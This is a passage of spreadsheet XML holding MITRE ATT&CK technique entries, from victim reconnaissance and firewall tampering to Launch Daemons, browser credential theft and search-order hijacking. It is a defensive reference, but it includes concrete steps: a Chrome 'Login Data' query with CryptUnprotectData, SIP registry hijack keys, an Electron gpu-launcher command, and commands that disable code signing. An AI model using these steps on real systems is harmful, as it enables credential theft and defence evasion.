Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Browser Session Hijacking</t>
  </si>
  <si>
    <t>Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and/or high-integrity/administrator rights.
Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)
https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. 
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28)
https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>T1556.007</t>
  </si>
  <si>
    <t>Hybrid Identity</t>
  </si>
  <si>
    <t>Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID 
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)
https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>T1059.009</t>
  </si>
  <si>
    <t>Cloud API</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).  
Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.
With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.
https://attack.mitre.org/techniques/T1059/009</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>T1218.015</t>
  </si>
  <si>
    <t>Electron Applications</t>
  </si>
  <si>
    <t>Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)
Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8)
Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)
https://attack.mitre.org/techniques/T1218/015</t>
  </si>
  <si>
    <t>T1562.012</t>
  </si>
  <si>
    <t>Disable or Modify Linux Audit System</t>
  </si>
  <si>
    <t>Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`,  containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
https://attack.mitre.org/techniques/T1562/012</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)
https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)
https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)
https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a &lt;code&gt;DescribeInstances&lt;/code&gt; API within the Amazon EC2 API that can return information about one or more instances within an account, the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request, the &lt;code&gt;HeadBucket&lt;/code&gt; API to determine a bucket’s existence along with access permissions of the request sender, or the &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as &lt;code&gt;DescribeDBInstances&lt;/code&gt; to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).
https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
